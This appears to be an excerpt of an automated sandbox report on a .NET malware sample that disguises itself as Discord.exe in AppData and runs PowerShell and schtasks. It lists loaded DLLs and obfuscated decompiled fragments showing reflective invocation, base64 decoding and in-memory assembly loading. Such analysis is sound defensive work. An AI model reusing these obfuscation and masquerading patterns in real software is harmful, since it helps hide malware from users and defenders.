                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: Discord.lnk.0.drLNK file: ..\..\..\..\..\Discord.exe
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: s3OBQLA3xR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: s3OBQLA3xR.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: s3OBQLA3xR.exe, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.v6X5ExXRH3lNTp84b4b8XfUON3Cu9S8ohF2pVtHLLDQMs6SjXs8nIJCi1kZ9QA2zKwVi2Z3HbICIB4N0tUm,_1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.RAktkBmjHI5enPkjYsNL1670bUFsHQppKzSAaipnX3ERPqGVTVsXYCBLaWcjEU4KjefLH7muPxmmCYP8VYo,_1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.F6kC2uEC72v4mrWg4NpIvtH1qfkJVrstqNYXDaxaQZNFb6njAiTvvxZzi8I5sctac1gblxFukrhrdQTpSq3,_1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.et606mk5fqvKytaw7f76wM4ki8OfP7x9Rr4ewcP74LjE6EsDwlrH98M7vQ12rHTRUEORZbuSHkON1U11BbL,U9pHMOisPp.Sla7w63Sq2()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: s3OBQLA3xR.exe, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{ddSPMX7Hq54DZlnQIudeqi5dcl6NSIm3cMpFdj5H3XoKJBQo3yjRz1XImrSVHXzqN3rM[2],U9pHMOisPp.Dr8WIudrtM(Convert.FromBase64String(ddSPMX7Hq54DZlnQIudeqi5dcl6NSIm3cMpFdj5H3XoKJBQo3yjRz1XImrSVHXzqN3rM[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: s3OBQLA3xR.exe, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { ddSPMX7Hq54DZlnQIudeqi5dcl6NSIm3cMpFdj5H3XoKJBQo3yjRz1XImrSVHXzqN3rM[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: Discord.exe.0.dr, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.v6X5ExXRH3lNTp84b4b8XfUON3Cu9S8ohF2pVtHLLDQMs6SjXs8nIJCi1kZ9QA2zKwVi2Z3HbICIB4N0tUm,_1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.RAktkBmjHI5enPkjYsNL1670bUFsHQppKzSAaipnX3ERPqGVTVsXYCBLaWcjEU4KjefLH7muPxmmCYP8VYo,_1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.F6kC2uEC72v4mrWg4NpIvtH1qfkJVrstqNYXDaxaQZNFb6njAiTvvxZzi8I5sctac1gblxFukrhrdQTpSq3,_1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.et606mk5fqvKytaw7f76wM4ki8OfP7x9Rr4ewcP74LjE6EsDwlrH98M7vQ12rHTRUEORZbuSHkON1U11BbL,U9pHMOisPp.Sla7w63Sq2()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Discord.exe.0.dr, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{ddSPMX7Hq54DZlnQIudeqi5dcl6NSIm3cMpFdj5H3XoKJBQo3yjRz1XImrSVHXzqN3rM[2],U9pHMOisPp.Dr8WIudrtM(Convert.FromBase64String(ddSPMX7Hq54DZlnQIudeqi5dcl6NSIm3cMpFdj5H3XoKJBQo3yjRz1XImrSVHXzqN3rM[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Discord.exe.0.dr, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { ddSPMX7Hq54DZlnQIudeqi5dcl6NSIm3cMpFdj5H3XoKJBQo3yjRz1XImrSVHXzqN3rM[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: s3OBQLA3xR.exe, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs | .Net Code: PWxz7Gney6usw9eueX4CD2LGxqA1z1lnL73Ho9T7auA5xJSyHcdId84TwlZIk5OuWcRB System.AppDomain.Load(byte[])
Source: s3OBQLA3xR.exe, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs | .Net Code: r9hz4Y205wmqSfrAQf0pAJLA2gMvIt0jQwqrolFAbOuIJBlhEaF4ZhfIP7XOxbnKY0Av System.AppDomain.Load(byte[])
Source: s3OBQLA3xR.exe, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs | .Net Code: r9hz4Y205wmqSfrAQf0pAJLA2gMvIt0jQwqrolFAbOuIJBlhEaF4ZhfIP7XOxbnKY0Av
Source: Discord.exe.0.dr, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs | .Net Code: PWxz7Gney6usw9eueX4CD2LGxqA1z1lnL73Ho9T7auA5xJSyHcdId84TwlZIk5OuWcRB System.AppDomain.Load(byte[])
Source: Discord.exe.0.dr, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs | .Net Code: r9hz4Y205wmqSfrAQf0pAJLA2gMvIt0jQwqrolFAbOuIJBlhEaF4ZhfIP7XOxbnKY0Av System.AppDomain.Load(byte[])
Source: Discord.exe.0.dr, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs | .Net Code: r9hz4Y205wmqSfrAQf0pAJLA2gMvIt0jQwqrolFAbOuIJBlhEaF4ZhfIP7XOxbnKY0Av
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Code function: 0_2_00007FFD9B7E00AD pushad ; iretd 0_2_00007FFD9B7E00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B6DD2A5 pushad ; iretd 1_2_00007FFD9B6DD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B7F00AD pushad ; iretd 1_2_00007FFD9B7F00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B8C2316 push 8B485F92h; iretd 1_2_00007FFD9B8C231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B6ED2A5 pushad ; iretd 4_2_00007FFD9B6ED2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B8019D2 pushad ; ret 4_2_00007FFD9B8019E1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B8000AD pushad ; iretd 4_2_00007FFD9B8000C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B8D2316 push 8B485F91h; iretd 4_2_00007FFD9B8D231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFD9B6BD2A5 pushad ; iretd 7_2_00007FFD9B6BD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFD9B7DBAE8 push E85A82D7h; ret 7_2_00007FFD9B7DBAF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFD9B7DACFA push E95978A2h; ret 7_2_00007FFD9B7DAE29
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFD9B7D00AD pushad ; iretd 7_2_00007FFD9B7D00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFD9B8A2316 push 8B485F94h; iretd 7_2_00007FFD9B8A231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FFD9B6CD2A5 pushad ; iretd 11_2_00007FFD9B6CD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FFD9B7E00AD pushad ; iretd 11_2_00007FFD9B7E00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FFD9B8B2316 push 8B485F93h; iretd 11_2_00007FFD9B8B231B
Source: C:\Users\user\AppData\Roaming\Discord.exe | Code function: 15_2_00007FFD9B7D00AD pushad ; iretd 15_2_00007FFD9B7D00C1
Source: C:\Users\user\AppData\Roaming\Discord.exe | Code function: 16_2_00007FFD9B7C00AD pushad ; iretd 16_2_00007FFD9B7C00C1
Source: C:\Users\user\AppData\Roaming\Discord.exe | Code function: 17_2_00007FFD9B8000AD pushad ; iretd 17_2_00007FFD9B8000C1
Source: C:\Users\user\AppData\Roaming\Discord.exe | Code function: 18_2_00007FFD9B7D00AD pushad ; iretd 18_2_00007FFD9B7D00C1
Source: C:\Users\user\AppData\Roaming\Discord.exe | Code function: 20_2_00007FFD9B7E00AD pushad ; iretd 20_2_00007FFD9B7E00C1
Source: s3OBQLA3xR.exe, CZoQY5TPrA.cs | High entropy of concatenated method names: '_9N48TDzPlp', 'sy68DDUpDh', '_9o87DLQc1n', 'cyDl7x4rnou9y4jNmiVSwBQWGahG', 'ac1VmwfQeZ5rtk0vNqL35KqxW6az', 'rSmDeTUawE7wPP7807wow4Ki45Iq', 'EEE1qt68Ifr4pCwbu32jKghGO3om', 'Zssh28rP4muRkGPC4LeVvpZahTvj', 'x3nVq4KS65LPH72Oi6Bi3vGETwua', 'IGVftO82XPk1jRUnUaOJ5vkRfaxc'
Source: s3OBQLA3xR.exe, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs | High entropy of concatenated method names: 'ohXYP8Uko9U95pjMwnQbLzUFEPdDh1gxY3Lxatao6nOlZFPCfrgY1HTpBlJlmHIGYMzb', 'PWxz7Gney6usw9eueX4CD2LGxqA1z1lnL73Ho9T7auA5xJSyHcdId84TwlZIk5OuWcRB', 'OJKhW1EvmFx7pk4vxpDjrRJvYJ9far7zYuFX4JEepPT1JmfE0O25zdDlGo86EUCxEiwv', 'o6lCx7lhJJ2LMtvK051igoGlPxHUaNrXIZwdZKbdTFp7TTyZV1fYgL8wleOAC4MV5hsr', 'EB0AUSwEn2ZUVM4yxNUc3dtLqy5lqtQiNii6diQvh1jZTJMU9OG90kddybdJ8Q2gPj2g', '_1hHnFcRcTVwKMoVDsztG3aJYzKkVxA3V27zB5I9Efq0R5F7hUoj5J9q2PndboJsZFQbF', 'jTUbfAvi5yCDAYlzI7OvS9HnpoRD6T3mM4ZaJDIN4KmYgmmPFnfn3CkU1On5fFAhtIAL', 'PNZmqOCVf9WZber8xvC3lwmCoSwJzfknoDxAvp8kDmDyBZUOqcXjF5Ss3Dg5CuODA7ut', 'jEtJk6YmDSKTdcK65x6qMNo8jnLwkkJLMC7jrYkbB2ohCx6JPjZgsX04msoW9YkEyY3T', 'iEgdlhIqZOTUNE6aLhSFH5zABLx4EXZmv6nPBdXaYgRwBNBcoQxySObpw5BLb93TsNP5'
Source: s3OBQLA3xR.exe, sobWCqEaS5.cs | High entropy of concatenated method names: 'h1gE9kffIY', 'n2rjTga0nCPTeZiYYZTgtFWpi4jW', '_9KzP4xoYMJSNc9E23pv58qTmrxcV', 'lLlNzB2h8MKY7t1gX6zkhsmjs6Xp', 'FZX4QAuopMG0e4YxMVGoirF7dIs8'
Source: s3OBQLA3xR.exe, 6mxeqGA8sGKwxoWnPU3gFq7MAvGAa88aOk2fUQoaodsFPsM7YR1gydyk9eQg2nc9Um4G.cs | High entropy of concatenated method names: 'K6yUrNFATVoGVqtQ2J7fmVMdUwHyLi29ZHSRSW1wVOLlHyqBumYz1Xf99CfoB4EboXnl', '_0BQ3F0Ehl9xngE4QA0amkyOgawIz7J6HbPSnpgvWVuH', 'YYgUewv3k3mbgAPGphUDp5EOF1tyv3JNnnFvArMiQ0T', 'hcDYmIIenLtT2fh8CVzT1iDyzuaw57N1bFFxvM94x8n', 'yeDmKkRW2lnI4uOuPBBx3bPpflrrf0ROrflKCQbA27d'
Source: s3OBQLA3xR.exe, xvglY57lNk9vQYqTfbKTBIlchHJYPPgp5YJaV63YWyHSbagxNbKBjxAD4KeBAH1BOeu7.cs | High entropy of concatenated method names: 'FRD8GC4inkaTauOGW0yWfUW6CC1TEVmBiP7NEZnYikjgTQ942rLCTBZZd9NdJaA8tz7X', 'bHnkGDpXqFzt70MnWagzYN5yX1smqNOidboKqkKI2eaCWKJXeswzVych0Wp1PIDBTUHu', '_0tGYNqW6Tm3FUaxV9VzNKUey26iSUAImqOuJqHbztjriPY8GRzCh7zALlD1ivxzivv6T', '_8ieB9V4HS3NhLDTdSVkvPiZczbAYydc3mjDJxqiVefVT1IKCPzFkiBsuAJOWP9GZwXkO', 'rH289oWq0fSMYtvt05itzsuNqdayt3CElayt86GY8QGIQJB70HOBi1oeZdIudiSQRP3q', 'kAZ22kEE53ZFygpt8mtUfVWCKUBf1Q2ICnWbzHJkfYuJqlJ2w2iWqKKKowerYv5Xrf2f', 'mELwor4E4WN8BzyKIfwKcue9PQCYI583ocJRxA9z4QyD47PoX7Ss16YnuRPPAn9SIu9y', 'HkS6hhdvSpSdlXnyQBIAVdzj9JBCvvM362mzto0U4gdSak4keKrwEnQ8vODFuEayu2KF', 'ofsUYbfRDOdoLbO9DS5zyu98s4ji1N2dD4vnoc6ROpzjE1QAu303DdlXhrwvcyDKynfw', 'ax1uNjsuN7DgGS4s7RN2NLp29tKDKu6WUCatpY7f9BpiEY09lssUNujchmF17RGoBpwn'
Source: s3OBQLA3xR.exe, U9pHMOisPp.cs | High entropy of concatenated method names: 'V1ebUJOBAV', 'N8Mno0anep', 'El3GnIDnLf', 'ANiwQr3ERh', '_8eC744DY2y', 'MdY7Ll7gYs', 'bzN1Mlomzo', 'VMlY5YX2QA', '_48i9XQq3nG', 'YJaeefkY2s'
Source: s3OBQLA3xR.exe, NRAeYCnbqOCZiFjqnN8SJKmkAMWNrpsv6Rb1U06ICthKqLloDf62JFflqZ6EQmsdumIbzy5s19huEwlg5zQ.cs | High entropy of concatenated method names: 'ligJKKSF1n1mRZKcvTI6chF8QRc8p8mbtBsKgjwJpp50rEb2Ju3RtUXUgwIxEsZD1OvJXNcUPCv8OTygEQi', 'f5uV8pn7lmcIDAa6g8Pl7c7mfzdr9pCz38BqZfC9XiLvFuBcX7IH7pCR4bWsHJMoALRqSuMQlhEO1owX2va', 'rkUPK0TMy82PJ44L80TKiSoKnaTy6dJFUjgYUx8bOsCeB4L1g2Awb3ohBs4xIIYRCkUbomhGu49a1ZGIWFx', 'jMWrGzt4HSckisu6h2mXyDfr6fdcMSau4sajG4ggcL2WoXTiAhumPh6ceCgyC0y5N9IUND4e0lobEBxwnLb', 'fP2RtqhTTC1UT5NKYEGbkkDOcZgbFyyqYgqANKnUFwjXXr1cGz8gDKiRtfQRGYqNRWMqblkTk89Syl4zC8L', 'avkaseHzf1TOnKieFjC2zxWwRkzGPQlPNudU53CY3xyE5hZnBKQt2cOmMmabWZuaRZuf5AYsVpSEKjEKTaY', 'cjPjGgi53fkGbOSu54282n9YtKV9d8U84FmH39z0V4A1tBWTEhpoEYYb42U8C35bX1esYPhj1kctH983EG3', 'Y8u9hBZuHt4IbFMcCnKF6XmwGEKiliKQslqvX1ypJ5jDcMXtlP2QATtLNfDwK0EUinfWLOyBr6nMcl2oL82', 'aZLnZuxmvgWCGnycKXQlANyGMtdkwFQsCxuuvfAyafUPUlGQZabmbcyCCNdVlV3yz29B99FjrbkGt9NlTwi', 'Ps3umLucOhLRAfDMi4gDHYqZNHcMenflp7TaKZ2WUsVPygXehATuqxabxw0236utz4v4k9xhL6CQMDWuM69'
Source: s3OBQLA3xR.exe, EthTUQiaut.cs | High entropy of concatenated method names: 'gR5ZScRWGE', 'P8Ck7Bercp', '_55RmmAyJ2t', 'zQaaSdJChj', 'oXvpgODT5AQv0KmDPT0SkmsFOncu', '_5w2F92eBYJADRO6xZdtmrW5EAswL', 'RotvUybCrXuKg3iUA6atrkMigMK4', 'gQi6PFKRJsw6IKxzuELSlU9Gs6zv', 'lQ90nuKnXhRmKkfrgSVRsqJHIWYA', 'RbykDHqQWXTLJznyEEt3nvH85xCP'
Source: s3OBQLA3xR.exe, GaULpswXIufzTGkabH57dWAWZLAY2FIFLB2IiUzoLOWVlY0Ba2R9rd92KzjGYDa6qNvw9fm4P8nngRNQQ9G.cs | High entropy of concatenated method names: 'fCXp6gdRaP1Ga0BC6yMxRXNP01BSH1K2FLSf00udV2wsPcIZkOGXuoBEtaSpioLacknDjaKmexsXfYZIXPk', 'xVOg5GQNIMvgdG2GcHSwPK6cFDZX8uxSvsscCNbhuKB9TfjfpIyCxl8L7U8lo6LYTJwnXdq16gU4fZ1QqMA', 'vImOKhBDwa5N5bJnMXkUfNua8fGenB5BcZp7PcvVjt83QAqOPseV6QAPhSQCXtbdlcD4B28zsV0mACprxkZ', 'i2nqIY4Th7dW1pwhIXK8CPqAR5icyNuolOvNdSabDwiOPPnUuvib3UZOZAL2tYqRjzRREYUCVMzTycUBy6H', 'wKyzeyqDVhzzUhThgNSx5mBbOTAWAuPO6xzZratl0t6C1Ct9gKMyGFXYAEXuTaR2uGEH9ClO09c1oKCBqz9', 'Dk6fIypn5gh1WOGYgtFzKklTn0WKfqRrXo4KRQJeoCk6FrgHViopsRptlcszMpEPbmw6rBsDVVzgbk3SAk7', 'QRoRxOgEGa1ZQCbaWKD4iDXVlnp9G7xRSxrXxkXfyRHH8BarawMoWU4f7vHUVPCfnvbAuCwkL4eHSFbjccf', 'suzMtiR1YfuSljVWnLq9FyoK7ysScmVdYBYFekilX2qTWARdHnSKTfZj2QsjLDBBLGUlmzzTDRBTXvnxelE', 'EzDSI6NqXosMtNhIdsVBJIMmOaD3oVxWGBd1WidW19loZ4vqAayTevSsEtZDzmE9PDouY98jaLLG8ej5cwo', 'lFENce2C326C8WrMM0xMnFwqA7q9v3cXjEDy3KJ7Gmt9KadoBYIP0UDakw7zHHMRaVlx'
Source: Discord.exe.0.dr, CZoQY5TPrA.cs | High entropy of concatenated method names: '_9N48TDzPlp', 'sy68DDUpDh', '_9o87DLQc1n', 'cyDl7x4rnou9y4jNmiVSwBQWGahG', 'ac1VmwfQeZ5rtk0vNqL35KqxW6az', 'rSmDeTUawE7wPP7807wow4Ki45Iq', 'EEE1qt68Ifr4pCwbu32jKghGO3om', 'Zssh28rP4muRkGPC4LeVvpZahTvj', 'x3nVq4KS65LPH72Oi6Bi3vGETwua', 'IGVftO82XPk1jRUnUaOJ5vkRfaxc'
Source: Discord.exe.0.dr, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs | High entropy of concatenated method names: 'ohXYP8Uko9U95pjMwnQbLzUFEPdDh1gxY3Lxatao6nOlZFPCfrgY1HTpBlJlmHIGYMzb', 'PWxz7Gney6usw9eueX4CD2LGxqA1z1lnL73Ho9T7auA5xJSyHcdId84TwlZIk5OuWcRB', 'OJKhW1EvmFx7pk4vxpDjrRJvYJ9far7zYuFX4JEepPT1JmfE0O25zdDlGo86EUCxEiwv', 'o6lCx7lhJJ2LMtvK051igoGlPxHUaNrXIZwdZKbdTFp7TTyZV1fYgL8wleOAC4MV5hsr', 'EB0AUSwEn2ZUVM4yxNUc3dtLqy5lqtQiNii6diQvh1jZTJMU9OG90kddybdJ8Q2gPj2g', '_1hHnFcRcTVwKMoVDsztG3aJYzKkVxA3V27zB5I9Efq0R5F7hUoj5J9q2PndboJsZFQbF', 'jTUbfAvi5yCDAYlzI7OvS9HnpoRD6T3mM4ZaJDIN4KmYgmmPFnfn3CkU1On5fFAhtIAL', 'PNZmqOCVf9WZber8xvC3lwmCoSwJzfknoDxAvp8kDmDyBZUOqcXjF5Ss3Dg5CuODA7ut', 'jEtJk6YmDSKTdcK65x6qMNo8jnLwkkJLMC7jrYkbB2ohCx6JPjZgsX04msoW9YkEyY3T', 'iEgdlhIqZOTUNE6aLhSFH5zABLx4EXZmv6nPBdXaYgRwBNBcoQxySObpw5BLb93TsNP5'
Source: Discord.exe.0.dr, sobWCqEaS5.cs | High entropy of concatenated method names: 'h1gE9kffIY', 'n2rjTga0nCPTeZiYYZTgtFWpi4jW', '_9KzP4xoYMJSNc9E23pv58qTmrxcV', 'lLlNzB2h8MKY7t1gX6zkhsmjs6Xp', 'FZX4QAuopMG0e4YxMVGoirF7dIs8'
Source: Discord.exe.0.dr, 6mxeqGA8sGKwxoWnPU3gFq7MAvGAa88aOk2fUQoaodsFPsM7YR1gydyk9eQg2nc9Um4G.cs | High entropy of concatenated method names: 'K6yUrNFATVoGVqtQ2J7fmVMdUwHyLi29ZHSRSW1wVOLlHyqBumYz1Xf99CfoB4EboXnl', '_0BQ3F0Ehl9xngE4QA0amkyOgawIz7J6HbPSnpgvWVuH', 'YYgUewv3k3mbgAPGphUDp5EOF1tyv3JNnnFvArMiQ0T', 'hcDYmIIenLtT2fh8CVzT1iDyzuaw57N1bFFxvM94x8n', 'yeDmKkRW2lnI4uOuPBBx3bPpflrrf0ROrflKCQbA27d'
